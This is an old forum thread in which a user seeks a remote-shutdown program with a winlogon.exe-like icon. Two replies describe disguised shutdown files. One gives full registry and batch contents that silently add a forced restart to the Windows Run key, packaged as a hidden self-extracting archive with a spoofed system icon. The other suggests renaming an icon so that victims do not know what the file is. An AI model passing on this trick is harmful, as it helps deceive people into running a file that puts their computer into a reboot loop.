Remote Shutdown

Status
Not open for further replies.

mohanty1942

Journeyman
I rarely hope to get a matching reply here for this odd query.

I had seen a small portable (installation not required) exe file whose purpose was to remotely shutdown machines. The icon was like that of winlogon.exe. The program description was something like "Remote Shutdown MFC Application".

Now I am searching for that program for more than over 6 months but not able to trace that. Please can anybody provide me that small exe file for remote shutdown WHOSE ICON LOOKS LIKE WINLOGON.EXE ?

Don't ask me why I am mad for that particular file when lot more with more features are available. I just like that program and want that particular one only.

Thanks for reading.
 
OP
mohanty1942

mohanty1942

Journeyman
I rarely hope to get a matching reply here for this odd query.

I had seen a small portable (installation not required) exe file whose purpose was to remotely shutdown machines. The icon was like that of winlogon.exe. The program description was something like "Remote Shutdown MFC Application".

Now I am searching for that program for more than over 6 months but not able to trace that. Please can anybody provide me that small exe file for remote shutdown WHOSE ICON LOOKS LIKE WINLOGON.EXE ?

Don't ask me why I am mad for that particular file when lot more with more features are available. I just like that program and want that particular one only.

Thanks for reading.
 

sumeetindia

Journeyman
This reply is really wired BUT works
U can make a batch file which merges an registery in the machine which (registry) contain the command "shutdown -r" and put them In startup
For silent merging U can use "REGEDIT /S shutdown.reg"
where shutdown.reg is the registery containing the "shutdown -r" command which is to be installed @ startup

Then make an RAR sfx executing the batch file
In the advance sfx option Select hide all windows
In the icon use the icon of "winlogon.exe" whic U can extract using resource hacker

All done!!
When anybody executer that sfx the extracts the batch file silenty
The batch file ads the registry entry which contains "shutdown -r" in the startup.

More details
The registery file contents "filename : shutdown.reg"

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shutdown -r"="C:\\WINDOWS\\system32\\shutdown.exe -r"
The batch file contents "filename : batch.bat"
Code:
ECHO OFF
c:\windows\regedit /s shutdown.reg
 
Last edited:

pirates1323

In the zone
hmmm... ok I have uploaded the file here

*rapidshare.com/files/22731978/remote_shutdown.exe.html

You can change the icon....so tht no one comes to know wht type of file is it ....so when u run the file ur computer gets shut down.....If u wnt to know wht happens when u click tht file just extract the files using winrar...and see the files which makes ur computer off.....

u can also shut down ur pc using command prompt ... just run this command or make a bat file of it

Shutdown.exe -s -t 0
 
OP
mohanty1942

mohanty1942

Journeyman
Dear Sumeet, Thank you for your efforts, But i am sorry. I don't opt to manually create & change the icon to achieve the same function with a similar looking file. I only & only want the VERY Original file that has to be somewhere in the net. So anybody who has come through such a program need to reply.
 
OP
mohanty1942

mohanty1942

Journeyman
Dear pirates1323
i am sorry. First of all don't tell me to change the icon of applicaion. My requirement was not the look of the icon, but to tell you about the very original file that has the same icon.

Secondly I opted for remote shutdown not for local PC shutdown.

I only & only want the VERY Original file that has to be somewhere in the net. So anybody who has come through such a program need to reply.
 
Status
Not open for further replies.
Top Bottom